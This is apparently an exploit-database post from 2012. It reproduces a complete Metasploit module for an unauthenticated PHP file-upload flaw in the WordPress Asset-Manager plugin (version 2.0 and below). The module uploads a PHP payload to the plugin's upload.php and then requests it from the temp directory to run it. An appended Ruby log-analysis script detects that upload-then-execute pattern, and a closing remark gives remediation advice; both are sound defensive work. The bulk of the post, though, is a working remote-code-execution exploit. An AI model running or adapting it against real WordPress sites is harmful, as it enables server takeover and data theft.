WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. It allows PHP file upload: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
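As an added example (not part of the original post or of the Metasploit module above), the following Ruby script shows how a defender can spot this exploit chain in web-server access logs: an unauthenticated POST to the plugin's upload.php followed shortly by a GET for a .php file under wp-content/uploads/assets/temp from the same client. The log lines, client addresses and the threshold window are constructed for the example.

```ruby
require 'time'

# Combined-format access log line (Apache/nginx); sample lines are constructed below.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /
UPLOAD_PATH = '/wp-content/plugins/asset-manager/upload.php'
TEMP_PHP_RE = %r{/wp-content/uploads/assets/temp/[^/?]+\.php(?:\?|\z)}i

def parse_line(line)
  m = LOG_RE.match(line) or return nil
  { ip: m[:ip], time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path], status: m[:status].to_i }
end

# A POST to upload.php is flagged :suspicious; a GET for a .php file under
# assets/temp from the same client within `window` seconds of such a POST is
# flagged :critical (upload followed by execution). Other temp/*.php GETs are
# :suspicious on their own, since that directory should never serve PHP.
def detect(lines, window: 300)
  alerts = []
  uploads = Hash.new { |h, k| h[k] = [] } # client ip => times of upload POSTs
  lines.each do |line|
    e = parse_line(line) or next
    bare = e[:path].split('?').first.downcase
    if e[:method] == 'POST' && bare.end_with?(UPLOAD_PATH)
      uploads[e[:ip]] << e[:time]
      alerts << { level: :suspicious, ip: e[:ip], path: e[:path], status: e[:status] }
    elsif e[:method] == 'GET' && e[:path] =~ TEMP_PHP_RE
      chained = uploads[e[:ip]].any? { |t| (e[:time] - t).between?(0, window) }
      alerts << { level: chained ? :critical : :suspicious, ip: e[:ip], path: e[:path], status: e[:status] }
    end
  end
  alerts
end

# Constructed sample: one exploit chain from 203.0.113.5, one benign image fetch.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [31/Dec/2012:09:22:33 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 58 "-" "Mozilla/5.0"
  203.0.113.5 - - [31/Dec/2012:09:22:34 +0000] "GET /wordpress/wp-content/uploads/assets/temp/qzTvm.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.9 - - [31/Dec/2012:09:25:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
LOG

if $0 == __FILE__
  detect(SAMPLE_LOG.lines).each { |a| puts "#{a[:level].upcase} #{a[:ip]} #{a[:path]} (#{a[:status]})" }
end
```

The log check only detects attempts; removing or updating the vulnerable plugin and denying PHP execution under wp-content/uploads in the web-server configuration address the root cause.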